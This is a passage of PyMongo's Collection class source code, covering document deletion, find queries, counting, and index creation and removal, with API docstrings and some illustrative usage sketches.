>>> result = db.test.delete_one({'x': 1})
>>> result.deleted_count
1
>>> db.test.count_documents({'x': 1})
2
:Parameters:
- `filter`: A query that matches the document to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, False,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def delete_many(self, filter, collation=None, session=None):
"""Delete one or more documents matching the filter.
>>> db.test.count_documents({'x': 1})
3
>>> result = db.test.delete_many({'x': 1})
>>> result.deleted_count
3
>>> db.test.count_documents({'x': 1})
0
:Parameters:
- `filter`: A query that matches the documents to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, True,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def find_one(self, filter=None, *args, **kwargs):
"""Get a single document from the database.
All arguments to :meth:`find` are also valid arguments for
:meth:`find_one`, although any `limit` argument will be
ignored. Returns a single document, or ``None`` if no matching
document is found.
The :meth:`find_one` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a dictionary specifying
the query to be performed OR any other type to be used as
the value for a query for ``"_id"``.
- `*args` (optional): any additional positional arguments
are the same as the arguments to :meth:`find`.
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to :meth:`find`.
>>> collection.find_one(max_time_ms=100)
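A small illustrative sketch (database and collection names are made up)
showing that a non-mapping `filter` is treated as an ``"_id"`` query::
    from bson.objectid import ObjectId
    from pymongo import MongoClient
    users = MongoClient().example_db.users  # illustrative collection
    oid = ObjectId()
    # These two calls run the same query.
    assert users.find_one(oid) == users.find_one({'_id': oid})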
"""
if (filter is not None and not
isinstance(filter, abc.Mapping)):
filter = {"_id": filter}
cursor = self.find(filter, *args, **kwargs)
for result in cursor.limit(-1):
return result
return None
def find(self, *args, **kwargs):
"""Query the database.
The `filter` argument is a prototype document that all results
must match. For example:
>>> db.test.find({"hello": "world"})
only matches documents that have a key "hello" with value
"world". Matches can have other keys *in addition* to
"hello". The `projection` argument is used to specify a subset
of fields that should be included in the result documents. By
limiting results to a certain subset of fields you can cut
down on network traffic and decoding time.
Raises :class:`TypeError` if any of the arguments are of
improper type. Returns an instance of
:class:`~pymongo.cursor.Cursor` corresponding to this query.
The :meth:`find` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a SON object specifying elements which
must be present for a document to be included in the
result set
- `projection` (optional): a list of field names that should be
returned in the result set or a dict specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `skip` (optional): the number of documents to omit (from
the start of the result set) when returning the results
- `limit` (optional): the maximum number of results to
return. A limit of 0 (the default) is equivalent to setting no
limit.
- `no_cursor_timeout` (optional): if False (the default), any
returned cursor is closed by the server after 10 minutes of
inactivity. If set to True, the returned cursor will never
time out on the server. Care should be taken to ensure that
cursors with no_cursor_timeout turned on are properly closed.
- `cursor_type` (optional): the type of cursor to return. The valid
options are defined by :class:`~pymongo.cursor.CursorType`:
- :attr:`~pymongo.cursor.CursorType.NON_TAILABLE` - the result of
this find call will return a standard cursor over the result set.
- :attr:`~pymongo.cursor.CursorType.TAILABLE` - the result of this
find call will be a tailable cursor - tailable cursors are only
for use with capped collections. They are not closed when the
last data is retrieved but are kept open and the cursor location
marks the final document position. If more data is received
iteration of the cursor will continue from the last document
received. For details, see the `tailable cursor documentation
<http://www.mongodb.org/display/DOCS/Tailable+Cursors>`_.
- :attr:`~pymongo.cursor.CursorType.TAILABLE_AWAIT` - the result
of this find call will be a tailable cursor with the await flag
set. The server will wait for a few seconds after returning the
full result set so that it can capture and return additional data
added during the query.
- :attr:`~pymongo.cursor.CursorType.EXHAUST` - the result of this
find call will be an exhaust cursor. MongoDB will stream batched
results to the client without waiting for the client to request
each batch, reducing latency. See notes on compatibility below.
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for this query. See
:meth:`~pymongo.cursor.Cursor.sort` for details.
- `allow_partial_results` (optional): if True, mongos will return
partial results if some shards are down instead of returning an
error.
- `oplog_replay` (optional): If True, set the oplogReplay query
flag.
- `batch_size` (optional): Limits the number of documents returned in
a single batch.
- `manipulate` (optional): **DEPRECATED** - If True (the default),
apply any outgoing SON manipulators before returning.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `return_key` (optional): If True, return only the index keys in
each document.
- `show_record_id` (optional): If True, adds a field ``$recordId`` in
each document with the storage engine's internal record identifier.
- `snapshot` (optional): **DEPRECATED** - If True, prevents the
cursor from returning a document more than once because of an
intervening write operation.
- `hint` (optional): An index, in the same format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.hint` on the cursor to tell Mongo the
proper index to use for the query.
- `max_time_ms` (optional): Specifies a time limit for a query
operation. If the specified time is exceeded, the operation will be
aborted and :exc:`~pymongo.errors.ExecutionTimeout` is raised. Pass
this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_time_ms` on the cursor.
- `max_scan` (optional): **DEPRECATED** - The maximum number of
documents to scan. Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_scan` on the cursor.
- `min` (optional): A list of field, limit pairs specifying the
inclusive lower bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.min` on the cursor. ``hint`` must
also be passed to ensure the query utilizes the correct index.
- `max` (optional): A list of field, limit pairs specifying the
exclusive upper bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max` on the cursor. ``hint`` must
also be passed to ensure the query utilizes the correct index.
- `comment` (optional): A string to attach to the query to help
interpret and trace the operation in the server logs and in profile
data. Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.comment` on the cursor.
- `modifiers` (optional): **DEPRECATED** - A dict specifying
additional MongoDB query modifiers. Use the keyword arguments listed
above instead.
.. note:: There are a number of caveats to using
:attr:`~pymongo.cursor.CursorType.EXHAUST` as cursor_type:
- The `limit` option can not be used with an exhaust cursor.
- Exhaust cursors are not supported by mongos and can not be
used with a sharded cluster.
- A :class:`~pymongo.cursor.Cursor` instance created with the
:attr:`~pymongo.cursor.CursorType.EXHAUST` cursor_type requires an
exclusive :class:`~socket.socket` connection to MongoDB. If the
:class:`~pymongo.cursor.Cursor` is discarded without being
completely iterated the underlying :class:`~socket.socket`
connection will be closed and discarded without being returned to
the connection pool.
.. versionchanged:: 3.7
Deprecated the `snapshot` option, which is deprecated in MongoDB
3.6 and removed in MongoDB 4.0.
Deprecated the `max_scan` option. Support for this option is
deprecated in MongoDB 4.0. Use `max_time_ms` instead to limit server
side execution time.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.5
Added the options `return_key`, `show_record_id`, `snapshot`,
`hint`, `max_time_ms`, `max_scan`, `min`, `max`, and `comment`.
Deprecated the option `modifiers`.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.0
Changed the parameter names `spec`, `fields`, `timeout`, and
`partial` to `filter`, `projection`, `no_cursor_timeout`, and
`allow_partial_results` respectively.
Added the `cursor_type`, `oplog_replay`, and `modifiers` options.
Removed the `network_timeout`, `read_preference`, `tag_sets`,
`secondary_acceptable_latency_ms`, `max_scan`, `snapshot`,
`tailable`, `await_data`, `exhaust`, `as_class`, and slave_okay
parameters. Removed `compile_re` option: PyMongo now always
represents BSON regular expressions as :class:`~bson.regex.Regex`
objects. Use :meth:`~bson.regex.Regex.try_compile` to attempt to
convert from a BSON regular expression to a Python regular
expression object. Soft deprecated the `manipulate` option.
.. versionchanged:: 2.7
Added `compile_re` option. If set to False, PyMongo represented BSON
regular expressions as :class:`~bson.regex.Regex` objects instead of
attempting to compile BSON regular expressions as Python native
regular expressions, thus preventing errors for some incompatible
patterns, see `PYTHON-500`_.
.. versionadded:: 2.3
The `tag_sets` and `secondary_acceptable_latency_ms` parameters.
.. _PYTHON-500: https://jira.mongodb.org/browse/PYTHON-500
.. mongodoc:: find
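An illustrative sketch (database, collection, and field names are made
up) combining a filter with ``projection``, ``sort``, and ``limit``::
    from pymongo import DESCENDING, MongoClient
    events = MongoClient().example_db.events  # illustrative collection
    cursor = events.find({'level': {'$gte': 3}},
                         projection={'ts': True, 'level': True},
                         sort=[('ts', DESCENDING)],
                         limit=10)
    for doc in cursor:
        # Each returned document contains only _id, ts, and level.
        print(doc)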
"""
return Cursor(self, *args, **kwargs)
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.find_raw_batches()
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: find_raw_batches does not support sessions or auto
encryption.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"find_raw_batches does not support sessions")
# OP_MSG is required to support encryption.
if self.__database.client._encrypter:
raise InvalidOperation(
"find_raw_batches does not support auto encryption")
return RawBatchCursor(self, *args, **kwargs)
def parallel_scan(self, num_cursors, session=None, **kwargs):
"""**DEPRECATED**: Scan this entire collection in parallel.
Returns a list of up to ``num_cursors`` cursors that can be iterated
concurrently. As long as the collection is not modified during
scanning, each document appears once in one of the cursors result
sets.
For example, to process each document in a collection using some
thread-safe ``process_document()`` function:
>>> def process_cursor(cursor):
... for document in cursor:
... # Some thread-safe processing function:
... process_document(document)
>>>
>>> # Get up to 4 cursors.
...
>>> cursors = collection.parallel_scan(4)
>>> threads = [
... threading.Thread(target=process_cursor, args=(cursor,))
... for cursor in cursors]
>>>
>>> for thread in threads:
... thread.start()
>>>
>>> for thread in threads:
... thread.join()
>>>
>>> # All documents have now been processed.
The :meth:`parallel_scan` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `num_cursors`: the number of cursors to return
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs`: additional options for the parallelCollectionScan
command can be passed as keyword arguments.
.. note:: Requires server version **>= 2.5.5**.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added back support for arbitrary keyword arguments. MongoDB 3.4
adds support for maxTimeMS as an option to the
parallelCollectionScan command.
.. versionchanged:: 3.0
Removed support for arbitrary keyword arguments, since
the parallelCollectionScan command has no optional arguments.
"""
warnings.warn("parallel_scan is deprecated. MongoDB 4.2 will remove "
"the parallelCollectionScan command.",
DeprecationWarning, stacklevel=2)
cmd = SON([('parallelCollectionScan', self.__name),
('numCursors', num_cursors)])
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
# We call sock_info.command here directly, instead of
# calling self._command to avoid using an implicit session.
result = sock_info.command(
self.__database.name,
cmd,
slave_ok,
self._read_preference_for(session),
self.codec_options,
read_concern=self.read_concern,
parse_write_concern_error=True,
session=session,
client=self.__database.client)
cursors = []
for cursor in result['cursors']:
cursors.append(CommandCursor(
self, cursor['cursor'], sock_info.address,
session=session, explicit_session=session is not None))
return cursors
def _count(self, cmd, collation=None, session=None):
"""Internal count helper."""
# XXX: "ns missing" checks can be removed when we drop support for
# MongoDB 3.0, see SERVER-17051.
def _cmd(session, server, sock_info, slave_ok):
res = self._command(
sock_info,
cmd,
slave_ok,
allowable_errors=["ns missing"],
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
if res.get("errmsg", "") == "ns missing":
return 0
return int(res["n"])
return self.__database.client._retryable_read(
_cmd, self._read_preference_for(session), session)
def _aggregate_one_result(
self, sock_info, slave_ok, cmd, collation=None, session=None):
"""Internal helper to run an aggregate that returns a single result."""
result = self._command(
sock_info,
cmd,
slave_ok,
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
batch = result['cursor']['firstBatch']
return batch[0] if batch else None
def estimated_document_count(self, **kwargs):
"""Get an estimate of the number of documents in this collection using
collection metadata.
The :meth:`estimated_document_count` method is **not** supported in a
transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
:Parameters:
- `**kwargs` (optional): See list of options above.
.. versionadded:: 3.7
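A minimal illustrative sketch (names are made up for the example)::
    from pymongo import MongoClient
    logs = MongoClient().example_db.logs  # illustrative collection
    # Metadata-based estimate; maxTimeMS bounds the server-side runtime.
    print(logs.estimated_document_count(maxTimeMS=500))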
"""
if 'session' in kwargs:
raise ConfigurationError(
'estimated_document_count does not support sessions')
cmd = SON([('count', self.__name)])
cmd.update(kwargs)
return self._count(cmd)
def count_documents(self, filter, session=None, **kwargs):
"""Count the number of documents in this collection.
.. note:: For a fast count of the total documents in a collection see
:meth:`estimated_document_count`.
The :meth:`count_documents` method is supported in a transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count. Must be
a positive integer. If not provided, no limit is imposed.
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
This option is only supported on MongoDB 3.6 and above.
The :meth:`count_documents` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (required): A query document that selects which documents
to count in the collection. Can be an empty document to count all
documents.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionadded:: 3.7
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
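An illustrative sketch using the options above (names are made up; the
``hint`` option assumes MongoDB 3.6+ and an existing index on
``status``)::
    from pymongo import ASCENDING, MongoClient
    orders = MongoClient().example_db.orders  # illustrative collection
    n = orders.count_documents({'status': 'shipped'},
                               skip=10,
                               limit=100,
                               hint=[('status', ASCENDING)])
    print(n)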
"""
pipeline = [{'$match': filter}]
if 'skip' in kwargs:
pipeline.append({'$skip': kwargs.pop('skip')})
if 'limit' in kwargs:
pipeline.append({'$limit': kwargs.pop('limit')})
pipeline.append({'$group': {'_id': 1, 'n': {'$sum': 1}}})
cmd = SON([('aggregate', self.__name),
('pipeline', pipeline),
('cursor', {})])
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
def _cmd(session, server, sock_info, slave_ok):
result = self._aggregate_one_result(
sock_info, slave_ok, cmd, collation, session)
if not result:
return 0
return result['n']
return self.__database.client._retryable_read(
_cmd, self._read_preference_for(session), session)
def count(self, filter=None, session=None, **kwargs):
"""**DEPRECATED** - Get the number of documents in this collection.
The :meth:`count` method is deprecated and **not** supported in a
transaction. Please use :meth:`count_documents` or
:meth:`estimated_document_count` instead.
All optional count parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count. A limit
of 0 (the default) is equivalent to setting no limit.
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
The :meth:`count` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (optional): A query document that selects which documents
to count in the collection.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
warnings.warn("count is deprecated. Use estimated_document_count or "
"count_documents instead. Please note that $where must "
"be replaced by $expr, $near must be replaced by "
"$geoWithin with $center, and $nearSphere must be "
"replaced by $geoWithin with $centerSphere",
DeprecationWarning, stacklevel=2)
cmd = SON([("count", self.__name)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
return self._count(cmd, collation, session)
def create_indexes(self, indexes, session=None, **kwargs):
"""Create one or more indexes on this collection.
>>> from pymongo import IndexModel, ASCENDING, DESCENDING
>>> index1 = IndexModel([("hello", DESCENDING),
... ("world", ASCENDING)], name="hello_world")
>>> index2 = IndexModel([("goodbye", DESCENDING)])
>>> db.test.create_indexes([index1, index2])
["hello_world", "goodbye_-1"]
:Parameters:
- `indexes`: A list of :class:`~pymongo.operations.IndexModel`
instances.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: `create_indexes` uses the `createIndexes`_ command
introduced in MongoDB **2.6** and cannot be used with earlier
versions.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. versionadded:: 3.0
.. _createIndexes: https://docs.mongodb.com/manual/reference/command/createIndexes/
"""
common.validate_list('indexes', indexes)
names = []
with self._socket_for_writes(session) as sock_info:
supports_collations = sock_info.max_wire_version >= 5
def gen_indexes():
for index in indexes:
if not isinstance(index, IndexModel):
raise TypeError(
"%r is not an instance of "
"pymongo.operations.IndexModel" % (index,))
document = index.document
if "collation" in document and not supports_collations:
raise ConfigurationError(
"Must be connected to MongoDB "
"3.4+ to use collations.")
names.append(document["name"])
yield document
cmd = SON([('createIndexes', self.name),
('indexes', list(gen_indexes()))])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
return names
def __create_index(self, keys, index_options, session, **kwargs):
"""Internal create index helper.
:Parameters:
- `keys`: a list of tuples [(key, type), (key, type), ...]
- `index_options`: a dict of index options.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
"""
index_doc = helpers._index_document(keys)
index = {"key": index_doc}
collation = validate_collation_or_none(
index_options.pop('collation', None))
index.update(index_options)
with self._socket_for_writes(session) as sock_info:
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
else:
index['collation'] = collation
cmd = SON([('createIndexes', self.name), ('indexes', [index])])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
def create_index(self, keys, session=None, **kwargs):
"""Creates an index on this collection.
Takes either a single key or a list of (key, direction) pairs.
The key(s) must be an instance of :class:`basestring`
(:class:`str` in Python 3), and the direction(s) must be one of
(:data:`~pymongo.ASCENDING`, :data:`~pymongo.DESCENDING`,
:data:`~pymongo.GEO2D`, :data:`~pymongo.GEOHAYSTACK`,
:data:`~pymongo.GEOSPHERE`, :data:`~pymongo.HASHED`,
:data:`~pymongo.TEXT`).
To create a single key ascending index on the key ``'mike'`` we just
use a string argument::
>>> my_collection.create_index("mike")
For a compound index on ``'mike'`` descending and ``'eliot'``
ascending we need to use a list of tuples::
>>> my_collection.create_index([("mike", pymongo.DESCENDING),
... ("eliot", pymongo.ASCENDING)])
All optional index creation parameters should be passed as
keyword arguments to this method. For example::
>>> my_collection.create_index([("mike", pymongo.DESCENDING)],
... background=True)
Valid options include, but are not limited to:
- `name`: custom name to use for this index - if none is
given, a name will be generated.
- `unique`: if ``True`` creates a uniqueness constraint on the index.
- `background`: if ``True`` this index should be created in the
background.
- `sparse`: if ``True``, omit from the index any documents that lack
the indexed field.
- `bucketSize`: for use with geoHaystack indexes.
Number of documents to group together within a certain proximity
to a given longitude and latitude.
- `min`: minimum value for keys in a :data:`~pymongo.GEO2D`
index.
- `max`: maximum value for keys in a :data:`~pymongo.GEO2D`
index.
- `expireAfterSeconds`: <int> Used to create an expiring (TTL)
collection. MongoDB will automatically delete documents from
this collection after <int> seconds. The indexed field must
be a UTC datetime or the data will not expire.
- `partialFilterExpression`: A document that specifies a filter for
a partial index. Requires server version >=3.2.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `wildcardProjection`: Allows users to include or exclude specific
field paths from a `wildcard index`_ using the { "$**" : 1} key
pattern. Requires server version >= 4.2.
See the MongoDB documentation for a full list of supported options by
server version.
.. warning:: `dropDups` is not supported by MongoDB 3.0 or newer. The
option is silently ignored by the server and unique index builds
using the option will fail if a duplicate value is detected.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `keys`: a single key or a list of (key, direction)
pairs specifying the index to create
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): any additional index creation
options (see the above list) should be passed as keyword
arguments
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for passing maxTimeMS
in kwargs.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.2
Added partialFilterExpression to support partial indexes.
.. versionchanged:: 3.0
Renamed `key_or_list` to `keys`. Removed the `cache_for` option.
:meth:`create_index` no longer caches index names. Removed support
for the drop_dups and bucket_size aliases.
.. mongodoc:: indexes
.. _wildcard index: https://docs.mongodb.com/master/core/index-wildcard/#wildcard-index-core
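An illustrative sketch of a TTL index and a unique partial index
(collection and field names are made up; the partial index assumes a
MongoDB 3.2+ server)::
    from pymongo import ASCENDING, MongoClient
    sessions = MongoClient().example_db.sessions  # illustrative collection
    # Documents expire one hour after their 'created_at' value.
    sessions.create_index([('created_at', ASCENDING)],
                          expireAfterSeconds=3600)
    # Only documents that actually have 'user_id' enter the unique index.
    sessions.create_index(
        [('user_id', ASCENDING)],
        unique=True,
        partialFilterExpression={'user_id': {'$exists': True}})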
"""
keys = helpers._index_list(keys)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
cmd_options = {}
if "maxTimeMS" in kwargs:
cmd_options["maxTimeMS"] = kwargs.pop("maxTimeMS")
self.__create_index(keys, kwargs, session, **cmd_options)
return name
def ensure_index(self, key_or_list, cache_for=300, **kwargs):
"""**DEPRECATED** - Ensures that an index exists on this collection.
.. versionchanged:: 3.0
**DEPRECATED**
"""
warnings.warn("ensure_index is deprecated. Use create_index instead.",
DeprecationWarning, stacklevel=2)
# The types supported by datetime.timedelta.
if not (isinstance(cache_for, integer_types) or
isinstance(cache_for, float)):
raise TypeError("cache_for must be an integer or float.")
if "drop_dups" in kwargs:
kwargs["dropDups"] = kwargs.pop("drop_dups")
if "bucket_size" in kwargs:
kwargs["bucketSize"] = kwargs.pop("bucket_size")
keys = helpers._index_list(key_or_list)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
# Note that there is a race condition here. One thread could
# check if the index is cached and be preempted before creating
# and caching the index. This means multiple threads attempting
# to create the same index concurrently could send the index
# to the server two or more times. This has no practical impact
# other than wasted round trips.
if not self.__database.client._cached(self.__database.name,
self.__name, name):
self.__create_index(keys, kwargs, session=None)
self.__database.client._cache_index(self.__database.name,
self.__name, name, cache_for)
return name
return None
def drop_indexes(self, session=None, **kwargs):
"""Drops all indexes on this collection.
Can be used on non-existent collections or collections with no indexes.
Raises OperationFailure on an error.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
self.__database.client._purge_index(self.__database.name, self.__name)
self.drop_index("*", session=session, **kwargs)
def drop_index(self, index_or_name, session=None, **kwargs):
"""Drops the specified index on this collection.
Can be used on non-existent collections or collections with no
indexes. Raises OperationFailure on an error (e.g. trying to
drop an index that does not exist). `index_or_name`
can be either an index name (as returned by `create_index`),
or an index specifier (as passed to `create_index`). An index
specifier should be a list of (key, direction) pairs. Raises
TypeError if index is not an instance of (str, unicode, list).
.. warning::
if a custom name was used on index creation (by
passing the `name` parameter to :meth:`create_index` or
:meth:`ensure_index`) the index **must** be dropped by name.
:Parameters:
- `index_or_name`: index (or name of index) to drop
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
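An illustrative sketch showing both ways to identify the index (names
are made up for the example)::
    from pymongo import DESCENDING, MongoClient
    events = MongoClient().example_db.events  # illustrative collection
    name = events.create_index([('ts', DESCENDING)])
    events.drop_index(name)                   # drop by generated name
    events.create_index([('ts', DESCENDING)])
    events.drop_index([('ts', DESCENDING)])   # drop by index specifier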
"""
name = index_or_name
if isinstance(index_or_name, list):
name = helpers._gen_index_name(index_or_name)
if not isinstance(name, string_type):
raise TypeError("index_or_name must be an index name or list")
self.__database.client._purge_index(
self.__database.name, self.__name, name)
cmd = SON([("dropIndexes", self.__name), ("index", name)])
cmd.update(kwargs)
with self._socket_for_writes(session) as sock_info:
self._command(sock_info,
cmd,
read_preference=ReadPreference.PRIMARY,
allowable_errors=["ns not found", 26],
write_concern=self._write_concern_for(session),
session=session)
def reindex(self, session=None, **kwargs):
"""Rebuilds all indexes on this collection.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the reIndex
command (like maxTimeMS) can be passed as keyword arguments.
.. warning:: reindex blocks all other operations (indexes
are built in the foreground) and will be slow for large
collections.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.5
We no longer apply this collection's write concern to this operation.
MongoDB 3.4 silently ignored the write concern. MongoDB 3.6+ returns
an error if we include the write concern.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
cmd = SON([("reIndex", self.__name)])
cmd.update(kwargs)
with self._socket_for_writes(session) as sock_info:
return self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
session=session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection.
>>> for index in db.test.list_indexes():
